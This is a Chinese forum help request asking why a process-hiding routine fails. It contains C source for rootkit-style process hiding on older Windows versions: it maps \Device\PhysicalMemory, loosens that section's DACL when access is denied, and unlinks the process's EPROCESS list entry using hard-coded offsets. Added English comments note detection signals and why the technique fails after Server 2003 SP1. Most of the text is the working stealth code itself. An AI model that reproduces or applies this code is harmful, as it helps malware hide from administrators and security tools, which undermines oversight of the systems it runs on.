求救:进程隐藏失败,源码分析!
请大家分析一下,看问题出在哪里,下面是调用隐藏的方法:
/*
 * HideProcessAtAll - user-mode DKOM (direct kernel object manipulation).
 *
 * Opens the \Device\PhysicalMemory section (OpenPhysicalMemory), picks a pair of
 * EPROCESS field offsets by OS version, reads the two ULONGs stored at
 * process+f and process+b, and rewrites them so the list entry that lives at
 * process+f is no longer reachable from either neighbour. The f/b pairs are
 * consistent with the Flink/Blink of a LIST_ENTRY inside EPROCESS (presumably
 * ActiveProcessLinks - not shown on this page, TODO confirm against the
 * kernel's structure layout for each listed build).
 *
 * Returns TRUE if InitNTDLL() failed (nothing was attempted) or the unlink was
 * attempted; returns FALSE if the physical-memory section could not be opened
 * or the OS version is not one of the hard-coded ones.
 *
 * Review notes (defensive):
 *  - The whole technique depends on a user-mode process mapping physical memory
 *    for write. Windows removed user-mode access to \Device\PhysicalMemory in
 *    Server 2003 SP1 and every later release, so on those systems
 *    OpenPhysicalMemory() fails (the symptom reported at the call site below).
 *    A user-mode process opening that section with write access is a strong
 *    detection signal on its own (object-access auditing / EDR).
 *  - Because only the kernel's process list entry is changed, the process still
 *    owns a handle table, threads and a PspCidTable entry; cross-view tools
 *    that enumerate from those sources will still show it.
 *  - GetVersionEx's return value is not checked; the osvi fields are read
 *    regardless.
 *  - The OpenProcess() handle is never closed (by design, see the comment at
 *    that line), so it outlives the function.
 */
BOOL HideProcessAtAll()
{
if (InitNTDLL())
{
if (OpenPhysicalMemory()==0) // reported failure point: returns 0 on every run (expected on >= 2003 SP1, see header)
{
return FALSE;
}
int f,b; // f = forward-link field offset, b = back-link field offset; set per OS build below, else return FALSE
OSVERSIONINFO osvi;
osvi.dwOSVersionInfoSize=sizeof(osvi);
GetVersionEx(&osvi); // return value unchecked
//f=0x88;b=0x8c;
if(osvi.dwMajorVersion==5)
{
if(osvi.dwMinorVersion==0)//win2k
{
f=0xa0;b=0xa4;
}
else if(osvi.dwMinorVersion==1)//winxp
{
f=0x88;b=0x8c;
}
else if(osvi.dwMinorVersion==2)//win2003
{
f=0x8a;b=0x8e; // NOTE(review): a LIST_ENTRY on x86 is 4-byte aligned; 0x8a/0x8e differ from the others' alignment - verify
}
else return FALSE;
}
else if(osvi.dwMajorVersion==4 && osvi.dwMinorVersion==0 &&osvi.dwPlatformId==2)//NT
{
f=0x98;b=0x9c;
}
else return FALSE; // any other version (including 6.x and later) is rejected here
// ULONG thread=GetData((PVOID)0xFFDFF124);
// ULONG process=GetData((PVOID)(thread+0x22c));
LocateNtdllEntry( );
// Open a handle to ourselves so this process shows up in its own handle table
// (the original comment says the PROCESS object type number is 5). The handle
// is intentionally never closed.
OpenProcess( PROCESS_ALL_ACCESS,FALSE,GetCurrentProcessId() );
ULONG process=(ULONG)GetEprocessFromPid( (DWORD)GetCurrentProcessId() ); // kernel address of our EPROCESS (helper not on this page)
ULONG fw=GetData(PVOID(process+f)); // neighbour reached via the forward link
ULONG bw=GetData(PVOID(process+b)); // neighbour reached via the back link
SetData(PVOID(fw+4),bw); // next->Blink = prev   (assumes Blink sits 4 bytes after Flink)
SetData(PVOID(bw),fw);   // prev->Flink = next   (our entry is now skipped by list walks)
UnmapViewOfFile(g_pMapPhysicalMemory);
CloseHandle(g_hMPM);
CloseNTDLL();
}
return TRUE; // also reached when InitNTDLL() fails
}
//OpenPhysicalMemory() 方法
/*
 * OpenPhysicalMemory - open the \Device\PhysicalMemory section for read/write
 * and map one page of it.
 *
 * Stores the section handle in g_hMPM and the mapped view in
 * g_pMapPhysicalMemory (both file-scope globals, declared elsewhere).
 * Returns g_hMPM on success, NULL if the section cannot be opened or mapped.
 *
 * Review notes (defensive):
 *  - The section's default DACL does not grant write access to ordinary
 *    callers. On STATUS_ACCESS_DENIED the code reopens with READ_CONTROL|WRITE_DAC,
 *    rewrites the DACL (SetPhyscialMemorySectionCanBeWrited, not on this page)
 *    and tries again. Modifying the DACL of \Device\PhysicalMemory is itself an
 *    auditable, highly anomalous event.
 *  - From Windows Server 2003 SP1 onward user-mode access to this section is
 *    not permitted at all, so the first ZwOpenSection fails for every caller;
 *    that alone explains a consistent NULL return on current systems.
 *  - The status of the READ_CONTROL|WRITE_DAC open is not checked before
 *    g_hMPM is passed to the DACL helper and to CloseHandle; if that open
 *    failed, g_hMPM is whatever value the call left behind.
 *  - Only a 0x1000-byte window at file offset 0x30000 is mapped here; the
 *    GetData/SetData helpers used by the caller are not on this page, so how
 *    they reach other physical addresses cannot be confirmed from here.
 */
HANDLE OpenPhysicalMemory()
{
NTSTATUS status;
UNICODE_STRING physmemString;
OBJECT_ATTRIBUTES attributes;
RtlInitUnicodeString( &physmemString, L"\\Device\\PhysicalMemory" );
attributes.Length = sizeof(OBJECT_ATTRIBUTES);
attributes.RootDirectory = NULL;
attributes.ObjectName = &physmemString;
attributes.Attributes = 0; // no OBJ_CASE_INSENSITIVE; the name is given in canonical case
attributes.SecurityDescriptor = NULL;
attributes.SecurityQualityOfService = NULL;
status = ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
if(status == STATUS_ACCESS_DENIED){
// Fallback: take WRITE_DAC on the section, loosen its DACL, then retry for map access.
// The status of this open is not checked before g_hMPM is used below.
status = ZwOpenSection(&g_hMPM,READ_CONTROL|WRITE_DAC,&attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);
status =ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
}
if( !NT_SUCCESS( status ))
{
return NULL; // any failure, including the access-denied path not recovering
}
g_pMapPhysicalMemory = MapViewOfFile(
g_hMPM,
4,        // FILE_MAP_WRITE
0,        // offset high
0x30000,  // offset low: physical address 0x30000
0x1000);  // one page
if( g_pMapPhysicalMemory == NULL )
{
return NULL; // g_hMPM is left open on this path
}
return g_hMPM;
}